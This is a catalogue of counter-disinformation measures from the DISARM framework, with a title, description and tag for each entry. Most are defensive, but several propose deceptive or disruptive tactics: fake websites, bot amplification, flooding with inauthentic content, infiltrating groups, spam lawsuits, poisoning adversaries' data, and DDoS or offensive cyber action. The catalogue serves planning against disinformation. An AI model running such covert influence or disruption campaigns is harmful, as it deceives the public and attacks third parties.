https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00026.md

Create culture of civility

This is passive. Includes promoting civility as an identity that people will defend.

The tag is: misp-galaxy:disarm-countermeasures="Create culture of civility"

Table 1036. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00027.md

Make information provenance available

Blockchain audit log and validation with collaborative decryption to post comments. Use blockchain technology to require collaborative validation before posts or comments are submitted. This could be used to adjust upvote weight via a trust factor of people and organisations you trust, or other criteria.

The tag is: misp-galaxy:disarm-countermeasures="Make information provenance available"

Table 1037. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00028.md

Create fake website to issue counter narrative and counter narrative through physical merchandise

Create websites in disinformation voids - spaces where people are looking for known disinformation.

The tag is: misp-galaxy:disarm-countermeasures="Create fake website to issue counter narrative and counter narrative through physical merchandise"

Table 1038. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00029.md

Develop a compelling counter narrative (truth based)

The tag is: misp-galaxy:disarm-countermeasures="Develop a compelling counter narrative (truth based)"

Table 1039. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00030.md

Dilute the core narrative - create multiple permutations, target / amplify

Create competing narratives. Included "Facilitate State Propaganda" as diluting the narrative could have an effect on the pro-state narrative used by volunteers, or lower their involvement.

The tag is: misp-galaxy:disarm-countermeasures="Dilute the core narrative - create multiple permutations, target / amplify"

Table 1040. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00031.md

Link to platform

The tag is: misp-galaxy:disarm-countermeasures="Hijack content and link to truth- based info"

Table 1041. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00032.md

Create more friction at account creation

Counters fake account

The tag is: misp-galaxy:disarm-countermeasures="Create more friction at account creation"

Table 1042. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00034.md

Infiltrate the in-group to discredit leaders (divide)

All of these would be highly affected by infiltration or false-claims of infiltration.

The tag is: misp-galaxy:disarm-countermeasures="Infiltrate the in-group to discredit leaders (divide)"

Table 1043. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00036.md

third party verification for people

counters fake experts

The tag is: misp-galaxy:disarm-countermeasures="third party verification for people"

Table 1044. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00040.md

Address truth contained in narratives

Focus on and boost truths in misinformation narratives, removing misinformation from them.

The tag is: misp-galaxy:disarm-countermeasures="Address truth contained in narratives"

Table 1045. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00042.md

Keep people from posting to social media immediately

Platforms can introduce friction to slow down activities, force a small delay between posts, or replies to posts.

The tag is: misp-galaxy:disarm-countermeasures="Keep people from posting to social media immediately"

Table 1046. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00044.md

Marginalise and discredit extremist groups

Reduce the credibility of extremist groups posting misinformation.

The tag is: misp-galaxy:disarm-countermeasures="Marginalise and discredit extremist groups"

Table 1047. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00046.md

Honeypot with coordinated inauthentics

Flood disinformation spaces with obviously fake content, to dilute core misinformation narratives in them.

The tag is: misp-galaxy:disarm-countermeasures="Honeypot with coordinated inauthentics"

Table 1048. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00047.md

Name and Shame Influencers

Think about the different levels: individual vs state-sponsored account. Includes “call them out” and “name and shame”. Identify social media accounts as sources of propaganda—“calling them out”— might be helpful to prevent the spread of their message to audiences that otherwise would consider them factual. Identify, monitor, and, if necessary, target externally-based nonattributed social media accounts. Impact of and Dealing with Trolls - "Chatham House has observed that trolls also sometimes function as decoys, as a way of “keeping the infantry busy” that “aims to wear down the other side” (Lough et al., 2014). Another type of troll involves “false accounts posing as authoritative information sources on social media”.

The tag is: misp-galaxy:disarm-countermeasures="Name and Shame Influencers"

Table 1049. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00048.md

Counter social engineering training

Includes anti-elicitation training, phishing prevention education.

The tag is: misp-galaxy:disarm-countermeasures="Counter social engineering training"

Table 1050. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00051.md

Infiltrate platforms

Detect and degrade

The tag is: misp-galaxy:disarm-countermeasures="Infiltrate platforms"

Table 1051. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00052.md

Delete old accounts / Remove unused social media accounts

remove or remove access to (e.g. stop the ability to update) old social media accounts, to reduce the pool of accounts available for takeover, botnets etc.

The tag is: misp-galaxy:disarm-countermeasures="Delete old accounts / Remove unused social media accounts"

Table 1052. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00053.md

Encourage people to leave social media

Encourage people to leave spcial media. We don’t expect this to work

The tag is: misp-galaxy:disarm-countermeasures="Encourage people to leave social media"

Table 1053. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00056.md

Report crowdfunder as violator

counters crowdfunding. Includes ‘Expose online funding as fake”.

The tag is: misp-galaxy:disarm-countermeasures="Report crowdfunder as violator"

Table 1054. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00058.md

Verification of project before posting fund requests

third-party verification of projects posting funding campaigns before those campaigns can be posted.

The tag is: misp-galaxy:disarm-countermeasures="Verification of project before posting fund requests"

Table 1055. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00059.md

Take legal action against for-profit "factories" creating misinformation.

The tag is: misp-galaxy:disarm-countermeasures="Legal action against for-profit engagement factories"

Table 1056. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00060.md

Free open library sources worldwide

Open-source libraries could be created that aid in some way for each technique. Even for Strategic Planning, some open-source frameworks such as DISARM can be created to counter the adversarial efforts.

The tag is: misp-galaxy:disarm-countermeasures="Free open library sources worldwide"

Table 1057. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00062.md

Reduce political targeting

Includes “ban political micro targeting” and “ban political ads”

The tag is: misp-galaxy:disarm-countermeasures="Reduce political targeting"

Table 1058. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00065.md

Co-opt a hashtag and drown it out (hijack it back)

Flood a disinformation-related hashtag with other content.

The tag is: misp-galaxy:disarm-countermeasures="Co-opt a hashtag and drown it out (hijack it back)"

Table 1059. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00066.md

Denigrate the recipient/ project (of online funding)

Reduce the credibility of groups behind misinformation-linked funding campaigns.

The tag is: misp-galaxy:disarm-countermeasures="Denigrate the recipient/ project (of online funding)"

Table 1060. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00067.md

Block access to disinformation resources

Resources = accounts, channels etc. Block access to platform. DDOS an attacker. TA02*: DDOS at the critical time, to deny an adversary’s time-bound objective. T0008: A quick response to a proto-viral story will affect it’s ability to spread and raise questions about their legitimacy. Hashtag: Against the platform, by drowning the hashtag. T0046 - Search Engine Optimisation: Sub-optimal website performance affect its search engine rank, which I interpret as "blocking access to a platform".

The tag is: misp-galaxy:disarm-countermeasures="Block access to disinformation resources"

Table 1061. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00070.md

Block source of pollution

Block websites, accounts, groups etc connected to misinformation and other information pollution.

The tag is: misp-galaxy:disarm-countermeasures="Block source of pollution"

Table 1062. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00071.md

Check special-interest groups (e.g. medical, knitting) for unrelated and misinformation-linked content, and remove it.

The tag is: misp-galaxy:disarm-countermeasures="Remove non-relevant content from special interest groups - not recommended"

Table 1063. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00072.md

Inoculate populations through media literacy training

Use training to build the resilience of at-risk populations. Educate on how to handle info pollution. Push out targeted education on why it’s pollution. Build cultural resistance to false content, e.g. cultural resistance to bullshit. Influence literacy training, to inoculate against “cult” recruiting. Media literacy training: leverage librarians / library for media literacy training. Inoculate at language. Strategic planning included as inoculating population has strategic value. Concepts of media literacy to a mass audience that authorities launch a public information campaign that teaches the programme will take time to develop and establish impact, recommends curriculum-based training. Covers detect, deny, and degrade.

The tag is: misp-galaxy:disarm-countermeasures="Inoculate populations through media literacy training"

Table 1064. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00073.md

Identify and delete or rate limit identical content

C00000

The tag is: misp-galaxy:disarm-countermeasures="Identify and delete or rate limit identical content"

Table 1065. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00074.md

normalise language

normalise the language around disinformation and misinformation; give people the words for artefact and effect types.

The tag is: misp-galaxy:disarm-countermeasures="normalise language"

Table 1066. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00075.md

Prohibit images in political discourse channels

Make political discussion channels text-only.

The tag is: misp-galaxy:disarm-countermeasures="Prohibit images in political discourse channels"

Table 1067. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00076.md

Develop networks of communities and influencers around counter-misinformation. Match them to misinformation creators

The tag is: misp-galaxy:disarm-countermeasures="Active defence: run TA15 "develop people” - not recommended"

Table 1068. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00077.md

Change Search Algorithms for Disinformation Content

Includes “change image search algorithms for hate groups and extremists” and “Change search algorithms for hate and extremist queries to show content sympathetic to opposite side”

The tag is: misp-galaxy:disarm-countermeasures="Change Search Algorithms for Disinformation Content"

Table 1069. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00078.md

Create competing narrative

Create counternarratives, or narratives that compete in the same spaces as misinformation narratives. Could also be degrade

The tag is: misp-galaxy:disarm-countermeasures="Create competing narrative"

Table 1070. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00080.md

Highlight flooding and noise, and explain motivations

Discredit by pointing out the "noise" and informing public that "flooding" is a technique of disinformation campaigns; point out intended objective of "noise"

The tag is: misp-galaxy:disarm-countermeasures="Highlight flooding and noise, and explain motivations"

Table 1071. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00081.md

Ground truthing as automated response to pollution

Also inoculation.

The tag is: misp-galaxy:disarm-countermeasures="Ground truthing as automated response to pollution"

Table 1072. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00082.md

Modify disinformation narratives, and rebroadcast them

Includes “poison pill recasting of message” and “steal their truths”. Many techniques involve promotion which could be manipulated. For example, online fundings or rallies could be advertised, through compromised or fake channels, as being associated with "far-up/down/left/right" actors. "Long Game" narratives could be subjected in a similar way with negative connotations. Can also replay technique T0003.

The tag is: misp-galaxy:disarm-countermeasures="Modify disinformation narratives, and rebroadcast them"

Table 1073. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00084.md

Mute content

Rate-limit disinformation content. Reduces its effects, whilst not running afoul of censorship concerns. Online archives of content (archives of websites, social media profiles, media, copies of published advertisements; or archives of comments attributed to bad actors, as well as anonymized metadata about users who interacted with them and analysis of the effect) is useful for intelligence analysis and public transparency, but will need similar muting or tagging/ shaming as associated with bad actors.

The tag is: misp-galaxy:disarm-countermeasures="Mute content"

Table 1074. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00085.md

Distract from noise with addictive content

Example: Interject addictive links or contents into discussions of disinformation materials and measure a "conversion rate" of users who engage with your content and away from the social media channel’s "information bubble" around the disinformation item. Use bots to amplify and upvote the addictive content.

The tag is: misp-galaxy:disarm-countermeasures="Distract from noise with addictive content"

Table 1075. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00086.md

Make more noise than the disinformation

The tag is: misp-galaxy:disarm-countermeasures="Make more noise than the disinformation"

Table 1076. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00087.md

Fake engagement system

Create honeypots for misinformation creators to engage with, and reduce the resources they have available for misinformation campaigns.

The tag is: misp-galaxy:disarm-countermeasures="Fake engagement system"

Table 1077. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00090.md

Honeypot social community

Set honeypots, e.g. communities, in networks likely to be used for disinformation.

The tag is: misp-galaxy:disarm-countermeasures="Honeypot social community"

Table 1078. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00091.md

Establish a truth teller reputation score for influencers

Includes "Establish a truth teller reputation score for influencers” and “Reputation scores for social media users”. Influencers are individuals or accounts with many followers.

The tag is: misp-galaxy:disarm-countermeasures="Establish a truth teller reputation score for influencers"

Table 1079. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00092.md

Influencer code of conduct

Establish tailored code of conduct for individuals with many followers. Can be platform code of conduct; can also be community code.

The tag is: misp-galaxy:disarm-countermeasures="Influencer code of conduct"

Table 1080. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00093.md

Force full disclosure on corporate sponsor of research

Accountability move: make sure research is published with its funding sources.

The tag is: misp-galaxy:disarm-countermeasures="Force full disclosure on corporate sponsor of research"

Table 1081. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00094.md

Strengthen institutions that are always truth tellers

Increase credibility, visibility, and reach of positive influencers in the information space.

The tag is: misp-galaxy:disarm-countermeasures="Strengthen institutions that are always truth tellers"

Table 1082. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00096.md

Require use of verified identities to contribute to poll or comment

Reduce poll flooding by online taking comments or poll entries from verified accounts.

The tag is: misp-galaxy:disarm-countermeasures="Require use of verified identities to contribute to poll or comment"

Table 1083. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00097.md

Revocation of allowlisted or "verified" status

remove blue checkmarks etc from known misinformation accounts.

The tag is: misp-galaxy:disarm-countermeasures="Revocation of allowlisted or "verified" status"

Table 1084. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00098.md

Strengthen verification methods

Improve content veerification methods available to groups, individuals etc.

The tag is: misp-galaxy:disarm-countermeasures="Strengthen verification methods"

Table 1085. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00099.md

Hashtag jacking

Post large volumes of unrelated content on known misinformation hashtags

The tag is: misp-galaxy:disarm-countermeasures="Hashtag jacking"

Table 1086. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00100.md

Create friction by rate-limiting engagement

Create participant friction. Includes Make repeat voting hard, and throttle number of forwards.

The tag is: misp-galaxy:disarm-countermeasures="Create friction by rate-limiting engagement"

Table 1087. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00101.md

Create a bot that engages / distract trolls

This is reactive, not active measure (honeypots are active). It’s a platform controlled measure.

The tag is: misp-galaxy:disarm-countermeasures="Create a bot that engages / distract trolls"

Table 1088. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00103.md

Buy more advertising than misinformation creators

Shift influence and algorithms by posting more adverts into spaces than misinformation creators.

The tag is: misp-galaxy:disarm-countermeasures="Buy more advertising than misinformation creators"

Table 1089. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00105.md

Click-bait centrist content

Create emotive centrist content that gets more clicks

The tag is: misp-galaxy:disarm-countermeasures="Click-bait centrist content"

Table 1090. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00106.md

Content moderation

includes social media content take-downs, e.g. facebook or Twitter content take-downs

The tag is: misp-galaxy:disarm-countermeasures="Content moderation"

Table 1091. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00107.md

Dampen Emotional Reaction

Reduce emotional responses to misinformation through calming messages, etc.

The tag is: misp-galaxy:disarm-countermeasures="Dampen Emotional Reaction"

Table 1092. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00109.md

Reduce polarisation by connecting and presenting sympathetic renditions of opposite views

The tag is: misp-galaxy:disarm-countermeasures="Reduce polarisation by connecting and presenting sympathetic renditions of opposite views"

Table 1093. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00111.md

"Prove they are not an op!"

Challenge misinformation creators to prove they’re not an information operation.

The tag is: misp-galaxy:disarm-countermeasures=""Prove they are not an op!""

Table 1094. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00112.md

Debunk and defuse a fake expert / credentials.

Debunk fake experts, their credentials, and potentially also their audience quality

The tag is: misp-galaxy:disarm-countermeasures="Debunk and defuse a fake expert / credentials."

Table 1095. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00113.md

Don’t engage with payloads

Stop passing on misinformation

The tag is: misp-galaxy:disarm-countermeasures="Don’t engage with payloads"

Table 1096. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00114.md

Expose actor and intentions

Debunk misinformation creators and posters.

The tag is: misp-galaxy:disarm-countermeasures="Expose actor and intentions"

Table 1097. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00115.md

Provide proof of involvement

Build and post information about groups etc’s involvement in misinformation incidents.

The tag is: misp-galaxy:disarm-countermeasures="Provide proof of involvement"

Table 1098. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00116.md

Downgrade / de-amplify so message is seen by fewer people

Label promote counter to disinformation

The tag is: misp-galaxy:disarm-countermeasures="Downgrade / de-amplify so message is seen by fewer people"

Table 1099. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00117.md

Repurpose images with new text

Add countermessage text to iamges used in misinformation incidents.

The tag is: misp-galaxy:disarm-countermeasures="Repurpose images with new text"

Table 1100. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00118.md

Engage payload and debunk.

debunk misinformation content. Provide link to facts.

The tag is: misp-galaxy:disarm-countermeasures="Engage payload and debunk."

Table 1101. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00119.md

Open dialogue about design of platforms to produce different outcomes

Redesign platforms and algorithms to reduce the effectiveness of disinformation

The tag is: misp-galaxy:disarm-countermeasures="Open dialogue about design of platforms to produce different outcomes"

Table 1102. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00120.md

Tool transparency and literacy for channels people follow.

Make algorithms in platforms explainable, and visible to people using those platforms.

The tag is: misp-galaxy:disarm-countermeasures="Tool transparency and literacy for channels people follow."

Table 1103. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00121.md

Remove or rate limit botnets

reduce the visibility of known botnets online.

The tag is: misp-galaxy:disarm-countermeasures="Remove or rate limit botnets"

Table 1104. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00123.md

Don’t feed the trolls

Don’t engage with individuals relaying misinformation.

The tag is: misp-galaxy:disarm-countermeasures="Don’t feed the trolls"

Table 1105. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00124.md

Prebunking

Produce material in advance of misinformation incidents, by anticipating the narratives used in them, and debunking them.

The tag is: misp-galaxy:disarm-countermeasures="Prebunking"

Table 1106. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00125.md

Social media amber alert

Create an alert system around disinformation and misinformation artefacts, narratives, and incidents

The tag is: misp-galaxy:disarm-countermeasures="Social media amber alert"

Table 1107. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00126.md

Create friction by marking content with ridicule or other "decelerants"

Repost or comment on misinformation artefacts, using ridicule or other content to reduce the likelihood of reposting.

The tag is: misp-galaxy:disarm-countermeasures="Create friction by marking content with ridicule or other "decelerants""

Table 1108. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00128.md

Use banking to cut off access

fiscal sanctions; parallel to counter terrorism

The tag is: misp-galaxy:disarm-countermeasures="Use banking to cut off access"

Table 1109. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00129.md

Mentorship: elders, youth, credit. Learn vicariously.

Train local influencers in countering misinformation.

The tag is: misp-galaxy:disarm-countermeasures="Mentorship: elders, youth, credit. Learn vicariously."

Table 1110. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00130.md

Seize and analyse botnet servers

Take botnet servers offline by seizing them.

The tag is: misp-galaxy:disarm-countermeasures="Seize and analyse botnet servers"

Table 1111. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00131.md

Deplatform Account*

Note: Similar to Deplatform People but less generic. Perhaps both should be left.

The tag is: misp-galaxy:disarm-countermeasures="Deplatform Account*"

Table 1112. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00133.md

Deplatform message groups and/or message boards

Merged two rows here.

The tag is: misp-galaxy:disarm-countermeasures="Deplatform message groups and/or message boards"

Table 1113. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00135.md

Microtarget most likely targets then send them countermessages

Find communities likely to be targetted by misinformation campaigns, and send them countermessages or pointers to information sources.

The tag is: misp-galaxy:disarm-countermeasures="Microtarget most likely targets then send them countermessages"

Table 1114. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00136.md

Spam domestic actors with lawsuits

File multiple lawsuits against known misinformation creators and posters, to distract them from disinformation creation.

The tag is: misp-galaxy:disarm-countermeasures="Spam domestic actors with lawsuits"

Table 1115. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00138.md

Weaponise youtube content matrices

God knows what this is. Keeping temporarily in case we work it out.

The tag is: misp-galaxy:disarm-countermeasures="Weaponise youtube content matrices"

Table 1116. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00139.md

Applies to most of the content used by exposure techniques except "T0055 - Use hashtag”. Applies to analytics

The tag is: misp-galaxy:disarm-countermeasures=""Bomb" link shorteners with lots of calls"

Table 1117. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00140.md

Platform adds warning label and decision point when sharing content

Includes “this has been disproved: do you want to forward it”. Includes “"Hey this story is old" popup when messaging with old URL” - this assumes that this technique is based on visits to an URL shortener or a captured news site that can publish a message of our choice. Includes “mark clickbait visually”.

The tag is: misp-galaxy:disarm-countermeasures="Platform adds warning label and decision point when sharing content"

Table 1118. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00142.md

(botnet) DMCA takedown requests to waste group time

Use copyright infringement claims to remove videos etc.

The tag is: misp-galaxy:disarm-countermeasures="(botnet) DMCA takedown requests to waste group time"

Table 1119. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00143.md

Buy out troll farm employees / offer them jobs

Degrade the infrastructure. Could e.g. pay to not act for 30 days. Not recommended

The tag is: misp-galaxy:disarm-countermeasures="Buy out troll farm employees / offer them jobs"

Table 1120. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00144.md

Make amplification of social media posts expire (e.g. can’t like/ retweet after n days)

Stop new community activity (likes, comments) on old social media posts.

The tag is: misp-galaxy:disarm-countermeasures="Make amplification of social media posts expire (e.g. can’t like/ retweet after n days)"

Table 1121. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00147.md

If creators are using network analysis to determine how to attack networks, then adding random extra links to those networks might throw that analysis out enough to change attack outcomes. Unsure which DISARM techniques.

The tag is: misp-galaxy:disarm-countermeasures="Add random links to network graphs"

Table 1122. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00148.md

Poison the monitoring & evaluation data

Includes Pollute the AB-testing data feeds: Polluting A/B testing requires knowledge of MOEs and MOPs. A/B testing must be caught early when there is relatively little data available so infiltration of TAs and understanding of how content is migrated from testing to larger audiences is fundamental.

The tag is: misp-galaxy:disarm-countermeasures="Poison the monitoring & evaluation data"

Table 1123. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00149.md

Take pre-emptive action against actors' infrastructure

Align offensive cyber action with information operations and counter disinformation approaches, where appropriate.

The tag is: misp-galaxy:disarm-countermeasures="Take pre-emptive action against actors' infrastructure"

Table 1124. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00153.md

Ask media not to report false information

Train media to spot and respond to misinformation, and ask them not to post or transmit misinformation they’ve found.

The tag is: misp-galaxy:disarm-countermeasures="Ask media not to report false information"

Table 1125. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00154.md

Ban incident actors from funding sites

Ban misinformation creators and posters from funding sites

The tag is: misp-galaxy:disarm-countermeasures="Ban incident actors from funding sites"

Table 1126. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00155.md

Better tell your country or organisation story

Civil engagement activities conducted on the part of EFP forces. NATO should likewise provide support and training, where needed, to local public affairs and other communication personnel. Local government and military public affairs personnel can play their part in creating and disseminating entertaining and sharable content that supports the EFP mission.

The tag is: misp-galaxy:disarm-countermeasures="Better tell your country or organisation story"

Table 1127. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00156.md

Have a disinformation response plan

e.g. Create a campaign plan and toolkit for competition short of armed conflict (this used to be called “the grey zone”). The campaign plan should account for own vulnerabilities and strengths, and not over-rely on any one tool of statecraft or line of effort. It will identify and employ a broad spectrum of national power to deter, compete, and counter (where necessary) other countries’ approaches, and will include understanding of own capabilities, capabilities of disinformation creators, and international standards of conduct to compete in, shrink the size, and ultimately deter use of competition short of armed conflict.

The tag is: misp-galaxy:disarm-countermeasures="Have a disinformation response plan"

Table 1128. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00159.md

find and train influencers

Identify key influencers (e.g. use network analysis), then reach out to identified users and offer support, through either training or resources.

The tag is: misp-galaxy:disarm-countermeasures="find and train influencers"

Table 1129. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00160.md

Coalition Building with stakeholders and Third-Party Inducements

Advance coalitions across borders and sectors, spanning public and private, as well as foreign and domestic, divides. Improve mechanisms to collaborate, share information, and develop coordinated approaches with the private sector at home and allies and partners abroad.

The tag is: misp-galaxy:disarm-countermeasures="Coalition Building with stakeholders and Third-Party Inducements"

Table 1130. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00161.md

Unravel/target the Potemkin villages

Kremlin’s narrative spin extends through constellations of “civil society” organisations, political parties, churches, and other actors. Moscow leverages think tanks, human rights groups, election observers, Eurasianist integration groups, and orthodox groups. A collection of Russian civil society organisations, such as the Federal Agency for the Commonwealth of Independent States Affairs, Compatriots Living Abroad, and International Humanitarian Cooperation, together receive at least US$100 million per year, in addition to government-organized nongovernmental organisations (NGOs), at least 150 of which are funded by Russian presidential grants totaling US$70 million per year.

The tag is: misp-galaxy:disarm-countermeasures="Unravel/target the Potemkin villages"

Table 1131. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00162.md

compatriot policy

protect the interests of this population and, more importantly, influence the population to support pro-Russia causes and effectively influence the politics of its neighbours

The tag is: misp-galaxy:disarm-countermeasures="compatriot policy"

Table 1132. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00164.md

Ensure integrity of official documents

e.g. for leaked legal documents, use court motions to limit future discovery actions

The tag is: misp-galaxy:disarm-countermeasures="Ensure integrity of official documents"

Table 1133. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00165.md

develop a creative content hub

international donors will donate to a basket fund that will pay a committee of local experts who will, in turn, manage and distribute the money to Russian-language producers and broadcasters that pitch various projects.

The tag is: misp-galaxy:disarm-countermeasures="develop a creative content hub"

Table 1134. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00169.md

elevate information as a critical domain of statecraft

